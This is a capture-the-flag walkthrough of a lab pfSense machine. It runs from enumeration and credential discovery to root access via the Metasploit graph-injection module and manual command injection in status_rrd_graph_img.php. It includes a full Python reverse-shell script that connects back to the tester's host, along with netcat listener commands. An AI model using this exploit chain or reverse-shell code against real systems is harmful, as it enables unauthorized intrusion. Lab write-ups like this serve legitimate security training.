Enumeration
Nmap discovered 2 open ports for http and ssl.
ORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Issuer: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-10-14T19:21:35
| Not valid after: 2023-04-06T19:21:35
| MD5: 65f8 b00f 57d2 3468 2c52 0f44 8110 c622
|_SHA-1: 4f7c 9a75 cb7f 70d3 8087 08cb 8c27 20dc 05f1 bb02
|_ssl-date: TLS randomness does not represent time
First, let’s add the host to hosts file, and go to the web application.
Apparently, the certificate is weird and the browser does not let me make an exception. So instead, let’s go to the application with just the IP in the URI:

Ok, going to the application with the IP works fine and a login form appears.
I have tried some default passwords and SQLi err check, with no success:

Wikipedia Info on PFSENSE
pfSense is a firewall / computer software distribution based on FreeBSD.
Searchsploit
# searchsploit pfsense
Exploit | Path
<deleted XSS and CSRF exploits>
pfSense - (Authenticated) Group Member Remote Command Execution (Metasploit) | unix/remote/43193.rb
pfSense 2.3.1_1 - Command Execution | php/webapps/43128.txt
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection | php/webapps/47413.py
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | php/webapps/43560.py
Exploit-DB
- metasploit module RCE – requires authenticated user
- python exploit command injection, reverse shel – requires auth
- “
pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection. This script will return a reverse shell on specified listener address and port. Ensure you have started a listener to catch the shell before running!
“
- “
Metasploit exploit modules
msf6 > search pfsense
Matching Modules
================
# Name Disclosure Date Rank Check Description
------------------------------------------------------------------------------------------------------------------------------------------
0 exploit/unix/http/pfsense_clickjacking 2017-11-21 normal No Clickjacking Vulnerability In CSRF Error Page pfSense
1 exploit/unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE
2 exploit/unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE
Dirbuster
Dirbuster did not find a single file or directory on port 80 (probably because of redirect/firewall rules). However, that is not the case for port 443.

The files system-users.txt, changelog.txt seem interesting. Let’s check them.
system-users.txt contents:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
We have a user Rohit with default credentials for pfsense.
According to NetgateDocs the default credentials for pfsense software are admin:pfsense so in our case should be rohit:pfsense
changelog.txt contents:
# Security Changelog
### Issue
There was a failure in updating the firewall. Manual patching is therefore required
### Mitigated
2 of 3 vulnerabilities have been patched.
### Timeline
The remaining patches will be installed during the next maintenance window
Apparently there have been 3 vulnerabilities, 2 of which are patched and 1 still available.
Exploit
Let’s login with the obtained credentials (rohit:pfsense). There are multiple dropboxes in the interface, however only under status we have additional functionalities.
During our enumeration phase we discovered multiple xploits, information about the fact that there is an unpatched vulnerability and we have credentials. Some of the identified exploits require authentication – we should try them first.
Meterpreter
1 exploit/unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE
Pbtaining a meterpreter from metasploit module pfsense_graph_injection_exec.
msf6 exploit(unix/http/pfsense_graph_injection_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39282 bytes) to 10.10.10.60
[+] Deleted KIXxVsv
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.60:15059) at 2021-04-14 09:43:38 -0400
meterpreter > shell
Process 97206 created.
Channel 0 created.
id
uid=0(root) gid=0(wheel) groups=0(wheel)
Manual exploitation
exploit-db
We know there is a command injection vulnerability somewhere. While googling more on that I’ve found the following post describing the command injection in status_rrd_graph_img.php in detail.
Within RRD GRAPHS is found the required php file whis is needed for this to work. Making a request from within the page with burp displays the following information:
GET /status_rrd_graph_img.php?start=1618380935&end=1618409735&database=system-processor.rrd&style=inverse&graph=eight_hour HTTP/1.1
Host: 10.10.10.60
Connection: close
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://10.10.10.60/status_rrd_graph.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4dbcd8342e5f415d50a83af577962a2e; cookie_test=1618413161
We’re interested in invoking queues database and inject our commands right after it:

Unfortunately the response is in gibberish which we don’t speak. A neat little trick is to pipe the response to netcat therefore making it readable like so:

Resulting in:
# nc -nvlp 3333
listening on [any] 3333 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 59699
CMD INJECT
In order for us to open a reverse shell we have to feed the request with our own python script from the said python exploit.
$ cat pipe-reverse.py
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.5",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
# nc -nvlp 3333 < pipe-reverse.py
listening on [any] 3333 ...
$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 20248
sh: can't access tty; job control turned off
# # id
uid=0(root) gid=0(wheel) groups=0(wheel)
There might be need to press “cancel” request on burp in order to activate the python script for the reverse shell.